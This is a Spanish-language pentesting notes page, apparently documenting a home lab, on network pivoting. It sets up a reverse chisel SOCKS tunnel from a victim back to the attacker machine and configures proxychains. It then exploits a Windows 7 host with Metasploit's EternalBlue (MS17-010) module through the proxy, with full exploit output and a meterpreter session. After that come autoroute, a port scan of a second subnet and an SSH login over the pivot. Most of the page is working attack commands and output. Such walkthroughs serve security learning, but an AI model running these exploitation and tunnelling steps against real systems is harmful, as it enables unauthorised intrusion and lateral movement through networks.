Pivoting

Chisel

Para crear un socket usaremos chisel. En la maquina atacante levantamos el chisel server con el comando:

chisel server -p 8000 --reverse

En la maquina victima, nos pasamos el chisel. (Si es windows pasamos el chisel.exe que encontramos en el repositorio oficial)

chisel.exe client 192.168.18.41:8000 R:socks

Con esto levantamos un socks5 en el puerto 1080. Configuramos el archivo de proxychains /etc/proxychains.conf:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  127.0.0.1       1080

Luego podemos usar proxychains:

proxychains curl 192.168.172.130

Doble Pivote con Metasploit

Primero empezamos con detectar la ip con windows en la segunda red, la cual es: 192.168.172.143. Verificamos si es vulnerable a eternalblue.

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.172.143                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Entonces al probar vemos que debemos agregar el socket a la conexion.

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 169.254.106.25:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Lo agregamos con el siguiente comando:

set PROXIES SOCKS5:127.0.0.1:1080

Y luego podemos ver que si es vulnerable:

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Luego usamos el exploit de eternalblue

msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

Elegimos el payload bind_shell, puesto que la maquina objetivo no tienen acceso a nuestra ip pero nosotros si a ella.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

Luego actualizamos las direcciones del target.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.172.143
RHOSTS => 192.168.172.143
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.172.143
RHOST => 192.168.172.143

Luego ingresamos de nuevo el proxy ya que se borra cuando actualizamos con el comando use.

set PROXIES SOCKS5:127.0.0.1:1080

Corremos el exploit para obtener la shell.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.172.143:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.172.143:445 - The target is vulnerable.
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.172.143:445 - Connecting to target for exploitation.
[+] 192.168.172.143:445 - Connection established for exploitation.
[+] 192.168.172.143:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.172.143:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.172.143:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.172.143:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600       
[+] 192.168.172.143:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.172.143:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.172.143:445 - Sending all but last fragment of exploit packet
[*] 192.168.172.143:445 - Starting non-paged pool grooming
[+] 192.168.172.143:445 - Sending SMBv2 buffers
[+] 192.168.172.143:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.172.143:445 - Sending final SMBv2 buffers.
[*] 192.168.172.143:445 - Sending last fragment of exploit packet!
[*] 192.168.172.143:445 - Receiving response from exploit packet
[+] 192.168.172.143:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.172.143:445 - Sending egg to corrupted connection.
[*] 192.168.172.143:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.172.143:4444
[*] Sending stage (200262 bytes) to 192.168.172.143
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:1080) at 2022-01-03 12:15:13 -0800
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Ahora realizamos un ipconfig para verificar las redes presentes.

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:f2:5c:18
MTU          : 1500
IPv4 Address : 192.168.172.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::887:d7b7:f6cf:2199
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 17
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:f2:5c:22
MTU          : 1500
IPv4 Address : 169.254.106.25
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::394a:efca:78d8:6a19
IPv6 Netmask : ffff:ffff:ffff:ffff::

Entonces, ahora lo que haremos sera realizar un autoroute

meterpreter > background
[*] Backgrounding session 1...

msf6 exploit(windows/smb/ms17_010_eternalblue) > search autoroute

Matching Modules
================

   #  Name                         Disclosure Date  Rank    Check  Description
   -  ----                         ---------------  ----    -----  -----------
   0  post/multi/manage/autoroute                   normal  No     Multi Manage Network Route via Meterpreter Session


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/autoroute

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 169.254.106.0
SUBNET => 169.254.106.0
msf6 post(multi/manage/autoroute) > set CMD add
CMD => add
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module.
[*] Running module against TEST
[*] Adding a route to 169.254.106.0/255.255.255.0...
[+] Route added to subnet 169.254.106.0/255.255.255.0.
[*] Post module execution completed

Luego podemos realizar un portscan en el puerto 22 para detectar las ips con servicio SSH.

msf6 post(multi/manage/autoroute) > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf6 post(multi/manage/autoroute) > use 5
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 169.254.106.0/24
RHOSTS => 169.254.106.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22
PORTS => 22
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 40
THREADS => 40
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 169.254.106.26:       - 169.254.106.26:22 - TCP OPEN
[*] 169.254.106.0/24:     - Scanned  38 of 256 hosts (14% complete)
[*] 169.254.106.0/24:     - Scanned  68 of 256 hosts (26% complete)
[*] 169.254.106.0/24:     - Scanned  80 of 256 hosts (31% complete)
[*] 169.254.106.0/24:     - Scanned 113 of 256 hosts (44% complete)
[*] 169.254.106.0/24:     - Scanned 129 of 256 hosts (50% complete)
[*] 169.254.106.0/24:     - Scanned 160 of 256 hosts (62% complete)
[*] 169.254.106.0/24:     - Scanned 183 of 256 hosts (71% complete)
[*] 169.254.106.0/24:     - Scanned 205 of 256 hosts (80% complete)
[*] 169.254.106.0/24:     - Scanned 238 of 256 hosts (92% complete)
[*] 169.254.106.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Lo que ahora haremos sera levantar un socket para poder conectarnos por ssh a esa direccion IP.

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

Ahora podemos configurar de nuevo nuestro proxychains en el socket 9050.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  127.0.0.1       9050

Luego, nos conectamos usando proxychains para verificar que el proxychains esta conectado correctamente.

proxychains ssh [email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-169.254.106.26:22-<><>-OK
[email protected]'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-43-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

152 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Jan  3 11:24:26 2022 from 169.254.106.25
leonardosd@ubuntu:~$

Last updated 2 years ago

hashtagChisel

hashtagDoble Pivote con Metasploit

Chisel

Doble Pivote con Metasploit